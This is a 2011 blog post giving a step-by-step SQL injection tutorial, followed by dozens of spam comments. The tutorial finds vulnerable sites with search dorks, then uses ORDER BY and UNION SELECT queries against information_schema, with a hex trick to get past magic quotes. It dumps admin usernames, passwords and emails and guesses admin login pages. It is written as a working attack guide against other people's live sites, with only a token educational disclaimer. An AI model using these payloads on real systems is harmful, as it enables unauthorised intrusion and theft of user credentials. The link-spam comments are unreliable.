Monday, May 16, 2011

Sql Injection with Step by step tutorial.

51 comments
 
Q what is sql injection?

A injecting sql queries into another database or using queries to get auth bypass as an admi
n.


Here you will find a very detailed, step by step tutorial written by me (PhortyPhour) on SQL injection. This is purely for educational purposes and is to be used at the discretion of the reader.


First we have to know what SQL injection is exactly.

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.


That is the first paragraph of the wikipedia page for SQLi (SQL injection) found here:
http://en.wikipedia.org/wiki/SQL_injection

I would advise reading the entire page.

What is covered in this tutorial?

Part One - Website Assessment
Section One - Finding a vulnerable website
Section Two - Determining the amount of columns
Section Three - Finding which columns are vulnerable

Part Two - Gathering Information
Section One - Determining the SQL version
Section Two - Finding the database

Part Three - The Good Stuff
Section One - Finding the table names
Section Two - Finding the column names
Section Three - Displaying the column contents
Section Four - Finding the admin page

Now let's begin.

Part One - Website Assessment

In order for us to start exploiting a website we must first know exactly what we are injecting into. This is what we will be covering in Part One along with how to assess the information that we gather.

Section One - Finding a vulnerable website

Vulnerable websites can be found using dorks (I will include a list at the end of this tutorial), either in Google or with an exploit scanner. For those of you that are unfamiliar with the term "dorks", I will try to explain.

Dorks are website URLs that are known to be vulnerable. In SQL injection these dorks look like this:


Code:
inurl:buy.php?id=

This will be inputted into a search engine and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.



Now let's say we found the page:


Code:
http://www.site.com/buy.php?id=1

In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:


Code:
http://www.site.com/buy.php?id=1'
or
http://www.site.com/buy.php?id='1

After pressing enter, if this website returns an error such as the following:


Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7

Or something along those lines, this means it's vulnerable to injection.

In the case where you are to find a website such as this:


Code:
http://www.site.com/buy.php?id=1&dog;catid=2

Then you must use the same technique with adding a ' except it must be between the value (in this case the number) and the operator (the "=" sign) so it looks like this:


Code:
http://www.site.com/buy.php?id='1&dog;catid='2

There are programs that will do this for you but to start off I would suggest simply to do things manually, using Google, and so I won't post any for you guys. If you feel so compelled to use one anyways. I recommend the Exploit Scanner by Reiluke.

Section Two - Determining the amount of columns

In order for us to be able to use commands and get results we must know how many columns there are on a website. So to find the number of columns we must use a very complex and advanced method that I like to call "Trial and Error" with the ORDER BY command Biggrin

NOTE: SQL does not care whether or not your letters are capitalized or not and I'm just doing it out of clarity, for all it cares your queries could look like this:


Code:
http://www.site.com/buy.php?id=-1 CaN I HaZ TeH PaSSwOrDs? PLz aNd ThX

IT DOESN'T MATTER (btw please don't think that was an actual command).

So back to the ORDER BY command. To find the number of columns we write a query with incrementing values until we get an error, like this:


Code:
http://www.site.com/buy.php?id=1 ORDER BY 1-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 2-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 3-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 4-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 5-- <---ERROR!

This means that there are four columns!

DON'T FORGET TO INCLUDE THE DOUBLE NULL (--) AFTER THE QUERY.
VERY IMPORTANT!

Section Three - Finding which columns are vulnerable

So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do this we use the UNION and SELECT queries while keeping the double null (--) at the end of the string. There is also one other difference that is small in size but not in importance, see if you can spot it.


Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,3,4--

If you couldn't spot the difference, it's the extra null in between the "=" sign and the value (the number).

buy.php?id=-1

Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Section One - Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4 because it really is a guessing game and for the kind of sites that are still using it, it's not worth your time.

If we look back to the end of Section Three in Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2). The command should look like this:


Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:


Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method must be used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:


Code:
5.1.47-community-log

Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

Section Two - Finding the database

Finding the name of the database is not always a necessary step to take to gather the information that you want, however in my experience folllowing these steps and finding the database may sometimes lead to a higher success rate.

To find the database we use a query like the one below:


Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:


Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,concat(database()),3,4--

Congrats! You now have the name of the database! Copy and paste the name somewhere safe, we'll need it for later.

Part Three - The Good Stuff

This is the fun part where we will find the usernames, emails and passwords!

Section One - Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:


Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so I'll try to explain. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.


Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:


Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue

You now have all the table names!


Section Two - Finding the column names


Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):


Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this will be included at the end of the tutorial).

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.
2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".
Hex/Char Converter

3. Click convert.
4. Copy the string of numbers/letters under Hex into your query so it looks like this:


Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Section Three - Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:


Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon (:) which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.

Section Four - Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:


Code:
http://www.site.com/admin
http://www.site.com/adminlogin
http://www.site.com/modlogin
http://www.site.com/moderator

Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!

Give credit where credit is due!

I do keep my promises so here is what I said I would include:

                            Thnx iHACK

51 Responses so far.

  1. Anonymous says:

    If you would spend the mqtbvfg superior perhaps Oakley Frogskins the day outside the house, make confident you supply your Oakley Frogskin a wonderful wipe down while you get residence to ensure particular dust Cheap Oakley Sunglasses and dust will never accumulate along with harden. Appropriate storage of your respective Oakley Jawbone is crucial, which is the reason why each pair also comes in its individual container. Men can check for sports along with fashionable Oakley Jawbones and have wide collection of frames along with lenses of countless colours along with styles.

  2. Anonymous says:

    lapa

  3. Anonymous says:

    lapa man na hayop

  4. Anonymous says:

    many ρаrents complaintѕ of hаbіtuation tο game plаtеful, аnd fun nutriеnt items such
    as aррle slices, carгots, raisins, hot chocolate french
    fries, mаrshmallοws аnԁ anything else уou Believe poωer be fun.

    You cannot reject thе range of сhoice and Independency to
    thе Dinosаur to win. Many tv set shows and newsωorthiness articles have the Webkinz site,
    their site iѕ deѕigned fοr children elderly six and uр.

  5. Anonymous says:

    It is posѕiblе that prеѕently GSN
    volition Рut up οpροrtunitiеs for enterprising yοuth gamе which can be dоne anԁ one
    of them is to Αct tro choi.

    Feel free to ѵiѕit my web-site - http://www.offthepond.net/groups/fun-and-educational-online-games-for-to-play-free-online-games-for-free/

  6. Anonymous says:

    Hello there. I am wondering if you may be interested in doing a website link exchange?
    I notice your blog: http://www.blogger.com/comment.
    g?blogID=1785923556379345782&postID=8080522011737239326 and my blog are structured around the same subject matter.

    I'd really like to switch links or perhaps guest author a article for you. Here is my personal e-mail: lynnmancini@gmail.com. I highly recommend you contact me if you're even remotely interested.
    Appreciate it.

    My web site: click resources

  7. Anonymous says:

    Thanks on your marvelous posting! I certainly enjoyed
    reading it, you happen to be a great author.
    I will remember to bookmark your blog and will eventually come back later on.
    I want to encourage you to ultimately continue
    your great posts, have a nice afternoon!

    Stop by my webpage: click the next internet page

  8. Anonymous says:

    Hey! I'm at work browsing your blog from my new apple iphone! Just wanted to say I love reading through your blog and look forward to all your posts! Keep up the great work!

    Here is my web site :: go to my site

  9. Anonymous says:

    Thanks for one's marvelous posting! I certainly enjoyed reading it, you can be a great author.I will always bookmark your blog and may come back very soon. I want to encourage continue your great job, have a nice holiday weekend!

    Stop by my site: click for source

  10. Anonymous says:

    Amazing blog! Do you have any suggestions for aspiring writers?
    I'm planning to start my own site soon but I'm a little lost
    on everything. Would you advise starting with a
    free platform like Wordpress or go for a paid option?
    There are so many options out there that I'm completely overwhelmed .. Any ideas? Bless you!

    Visit my web page :: Full Content

  11. Anonymous says:

    Hey! This is my first visit to your blog! We are a group
    of volunteers and starting a new project in a community in the same niche.
    Your blog provided us valuable information to work on.

    You have done a wonderful job!

    Also visit my web page ... link building tool

  12. Anonymous says:

    I am wondering which blogging platform you're running? I'm new to running
    a blog and have been thinking about using the Vox platform.
    Do you consider this is a good foundation to start
    with? I would be really grateful if I could ask you some questions through email so I can learn a bit more before getting started.
    When you have some free time, please make sure to get in touch with me at: sethbillingsley@yahoo.
    com. Cheers

    Feel free to surf to my homepage: link building expert

  13. Anonymous says:

    Hello just happened upon your blog from Yahoo after I typed in, "Blogger: iHack" or perhaps something similar
    (can't quite remember exactly). In any case, I'm happy
    I found it because your subject material is exactly
    what I'm looking for (writing a college paper) and I hope you don't
    mind if I gather some information from here and I will of course credit you as the source.

    Thank you.

    Here is my homepage visit the following web page

  14. Anonymous says:

    Incredible! I'm really enjoying the style and design of your website. Are you using a custom theme or is this readily available to all individuals? If you really don't
    want to say the name of it out in the public, please e-mail me at:
    christalketchum@arcor.de. I'd love to get my hands on this template! Appreciate it.

    My blog; visit the website

  15. Anonymous says:

    Hey there! I just wanted to ask if you ever have any trouble with hackers?

    My last blog (wordpress) was hacked and I ended up losing several weeks of hard work due
    to no backup. Do you have any methods to protect against hackers?


    Look into my page; read the full info here

  16. Anonymous says:

    We have gone ahead and added a hyperlink back to your web page from one
    of my clients requesting it. I have used your internet site URL: http://www.
    blogger.com/comment.g?blogID=1785923556379345782&postID=8080522011737239326 and blog title: Blogger: iHack to make certain you get the
    correct anchor text. If you woud like to check out where your
    link has been placed, please e-mail me at: leandro_tolley@bigstring.

    com. Thanks!

    Feel free to surf to my blog post ... auto insurance calgary

  17. Anonymous says:

    Heya! This is the third time visiting now and I just wanted to say I truley
    fancy reading through your blog website. I've decided to bookmark it at digg.com with the title: Blogger: iHack and your Domain name: http://www.blogger.com/comment.g?blogID=1785923556379345782&postID=8080522011737239326. I hope this is fine with you, I'm making an attempt
    to give your fantastic blog a bit more publicity.
    Be back shortly.

    My web site related web-site

  18. Anonymous says:

    Do you have a spam issue on this website; I also am a blogger, and I was wanting to know your situation;
    we have developed some nice methods and we are looking to trade techniques with other
    folks, be sure to shoot me an e-mail if interested.

    Look at my web page :: link building strategies

  19. Anonymous says:

    Hi there administrator, I just wanted to give you
    a quick heads up that your Domain name: http://www.
    blogger.com/comment.g?blogID=1785923556379345782&postID=8080522011737239326 is
    being flagged as a possibly malicious web site in my browser ie.
    I would highly suggest having someone look into it.
    You could very well lose a lot of readers due to this issue.

    Very best of Luck.

    My blog post: alberta auto insurance

  20. Anonymous says:

    Hello there! Quick question that's totally off topic. Do you know how to make your site mobile friendly? My blog looks weird when browsing from my iphone 4. I'm trying to find a template or plugin that might be able to correct this problem.
    If you have any suggestions, please share. Thanks!

    Feel free to surf to my web page :: http://www.upbusiness.com.br/elgg/profile/MercedesW

  21. Anonymous says:

    Hi just wanted to give you a quick heads up and let you know a few of the pictures aren't loading properly. I'm not sure why
    but I think its a linking issue. I've tried it in two different browsers and both show the same results.

    Also visit my homepage :: short term auto insurance

  22. Anonymous says:

    Good day! This is kind of off topic but I need some help from an established
    blog. Is it hard to set up your own blog? I'm not very techincal but I can figure things out pretty fast. I'm thinking about setting up my
    own but I'm not sure where to start. Do you have any ideas or suggestions? Thanks

    Feel free to visit my website: telabr.com.br

  23. Anonymous says:

    Hi there! I know this is kinda off topic but I was wondering
    which blog platform are you using for this site?
    I'm getting fed up of Wordpress because I've had issues with hackers and I'm looking at alternatives for another platform. I would be awesome if you could point me in the direction of a good platform.

    Feel free to surf to my web page; visit this page ()

  24. Anonymous says:

    Hey, I think your site might be having browser compatibility issues.

    When I look at your website in Safari, it looks fine but when opening in Internet Explorer, it has some overlapping.

    I just wanted to give you a quick heads up! Other then that,
    very good blog!

    Also visit my web blog - Highly recommended Reading :: ::

  25. Anonymous says:

    Hey there! This is the fourth time visiting now and I just wanted to say I truley fancy looking
    through your blog site. I decided to bookmark it at reddit.
    com with the title: Blogger: iHack and your Website address: http:
    //www.blogger.com/comment.g?blogID=1785923556379345782&postID=8080522011737239326.
    I hope this is fine with you, I'm making an attempt to give your good blog a bit more publicity. Be back soon.

    my web page ... Highly recommended Reading

  26. Anonymous says:

    Woah! I'm really loving the template/theme of this blog. It's simple,
    yet effective. A lot of times it's very hard to get that "perfect balance" between usability and visual appearance. I must say you've done a amazing job with this.

    Additionally, the blog loads extremely quick for me on Safari.
    Superb Blog!

    Here is my site; Continue Reading

  27. Anonymous says:

    I'm really enjoying the design and layout of your website. It's
    a very easy on the eyes which makes it much more pleasant
    for me to come here and visit more often.
    Did you hire out a designer to create your theme?

    Superb work!

    Have a look at my web blog :: Suggested Webpage :: ::

  28. Anonymous says:

    Good day! This is kind of off topic but I need some advice from an established
    blog. Is it tough to set up your own blog? I'm not very techincal but I can figure things out pretty quick. I'm
    thinking about setting up my own but I'm not sure where to begin. Do you have any tips or suggestions? Many thanks

    my site ... link building blog []

  29. Anonymous says:

    Hello there. I'm wondering if you would be interested in doing a website link swap? I notice your website: http://www.blogger.com/comment.g?blogID=1785923556379345782&postID=8080522011737239326 and my blog are centered around the same topic. I'd love to switch links or possibly guest author a post
    for you. Here is my personal contact: dianne-vetter@live.
    de. Please be sure to contact me if you're even remotely interested. Thanks.

    Check out my web-site ... seo link building service

  30. Anonymous says:

    Hello! I know this is kinda off topic but I was wondering if you knew where I
    could locate a captcha plugin for my comment form?
    I'm using the same blog platform as yours and I'm having difficulty finding one?
    Thanks a lot!

    Feel free to visit my site: Read More At this website
    *http://quartodemilha.ning.com/profile/AdanTaylor*

  31. Anonymous says:

    I’m not that much of a internet reader to be honest but your blogs really nice,
    keep it up! I'll go ahead and bookmark your site to come back in the future. Many thanks

    Here is my web page - Related Site ()

  32. Anonymous says:

    Hey just wanted to give you a brief heads up and let you know a few of the
    images aren't loading correctly. I'm not sure why but
    I think its a linking issue. I've tried it in two different internet browsers and both show the same results.

    my blog just click the up coming internet page - -

  33. Anonymous says:

    I'm not sure exactly why but this weblog is loading very slow for me. Is anyone else having this issue or is it a problem on my end? I'll check back later on and see if the problem still exists.


    Feel free to visit my web site :: find auto insurance :: ::

  34. Anonymous says:

    Browsing delicious.com I noticed your blog book-marked as:
    Blogger: iHack. Now i'm assuming you book marked it yourself and wanted to ask if social bookmarking gets you a bunch of traffic? I've been thinking
    about doing some bookmarking for a few of my websites but
    wasn't sure if it would produce any positive results. Appreciate it.

    My web page :: Visit This Link

  35. Anonymous says:

    Hey I know this is off topic but I was wondering if you
    knew of any widgets I could add to my blog that automatically tweet my newest twitter updates.
    I've been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

    Visit my page; Suggested Website

  36. Anonymous says:

    Hi there admin, I just wanted to give you a quick heads up that
    your Link: http://www.blogger.com/comment.
    g?blogID=1785923556379345782&postID=8080522011737239326 is being flagged as a potentially malicious web page in my web browser ie.
    I'd highly suggest having somebody look into it. You can lose a lot of guests due to this kind of problem. Best of Luck.

    Here is my web page ... Additional Info

  37. Anonymous says:

    Wow! This blog looks just like my old one! It's on a totally different topic but it has pretty much the same page layout and design. Wonderful choice of colors!

    My site ... temporary auto insurance :: ::

  38. Anonymous says:

    Hello! I know this is kind of off topic but I was wondering which blog platform are you using for
    this website? I'm getting sick and tired of Wordpress because I've had problems with hackers and I'm looking at alternatives for another platform. I would be great if you could point me in the direction of a good platform.

    Also visit my webpage; relevant resource site :: passingtree.com ::

  39. Anonymous says:

    Hi there! I know this is kinda off topic but I'd figured I'd ask.

    Would you be interested in exchanging links or maybe guest writing a blog
    article or vice-versa? My website discusses a lot of the same topics as yours and
    I believe we could greatly benefit from each other.
    If you are interested feel free to shoot me an e-mail.
    I look forward to hearing from you! Fantastic blog by
    the way!

    Also visit my site ... santa fe auto insurance
    **

  40. Anonymous says:

    Hi there! I could have sworn I've been to this website before but after reading through some of the post I realized it's new
    to me. Nonetheless, I'm definitely delighted I found it and I'll be bookmarking and checking back often!


    my blog; just click the up coming article ()

  41. Anonymous says:

    I was curious if you ever thought of changing the page layout of your blog?
    Its very well written; I love what youve got to say. But maybe you
    could a little more in the way of content so people could
    connect with it better. Youve got an awful lot of text for only having
    one or two images. Maybe you could space it out better?


    Also visit my web-site ... official site

  42. Anonymous says:

    Hi! I hope you do not mind but I decided to post your
    blog: http://www.blogger.com/comment.g?blogID=1785923556379345782&postID=8080522011737239326 to my on-line directory.
    I used, "Blogger: iHack" as your weblog headline.
    I hope this is acceptable with you. In the event you'd like me to change the title or perhaps remove it completely, e-mail me at kenton_tremblay@gmail.com. Thank you so much., e.g. just click the up coming page!

  43. Anonymous says:

    Hi there! Do you know if they make any plugins
    to protect against hackers? I'm kinda paranoid about losing everything I've worked hard on.

    Any tips?

    Here is my website: best link building services

  44. Anonymous says:

    It's an remarkable article in favor of all the internet visitors; they will take advantage from it I am sure.

    my site - übersetzung russisch deutsch leo (ouaa.org)

  45. Anonymous says:

    Today, I went to the beach with my kids. I found a sea shell and gave it
    to my 4 year old daughter and said "You can hear the ocean if you put this to your ear." She put the
    shell to her ear and screamed. There was a hermit
    crab inside and it pinched her ear. She never wants to go back!
    LoL I know this is totally off topic but I had to tell someone!


    My blog post; best backlinks

  46. Anonymous says:

    Your site appears to be having some compatibilty problems in my internet explorer browser.
    The text appears to be running off the page pretty
    bad. If you want you can contact me at: teresitaschweitzer@gawab.

    com and I'll shoot you over a screenshot of the problem.

    Visit my page - link wheel building service

  47. Anonymous says:

    Heya. I'm sorry to hassle you but I happened to run across your blog site and noticed you are using the exact same theme as me. The only problem is on my website, I'm battling to get the page layout looking like yours.
    Would you mind emailing me at: melanie_collazo@yahoo.
    com so I can get this figured out. By the way I've bookmarked your web page: http://www.blogger.com/comment.g?blogID=1785923556379345782&postID=8080522011737239326 and will certainly be visiting often. Thank you!

    Here is my blog post :: what is link building services

  48. Anonymous says:

    Hi, i read your blog from time to time and i own a similar one
    and i was just curious if you get a lot of spam remarks?
    If so how do you stop it, any plugin or anything you
    can advise? I get so much lately it's driving me mad so any assistance is very much appreciated.

    Also visit my site; Seo consultant services

  49. Liu Liu says:

    New wholesale nfl jerseys York Giants receiver Odell Beckham’s run-in with the kicking net on the Nike Roshe Run sideline went viral, but NFL Jerseys there’s no beef between the cheap nfl jerseys two. Beckham and the kicking net are friends again, after Beckham Nike Air Max 2015 Shoes went over to the net Nike Air Max 90 and Nike Free Run hugged it after his catch against the Green Bay Packers was ruled a touchdown. Hilarious. nfl jerseys store

Leave a Reply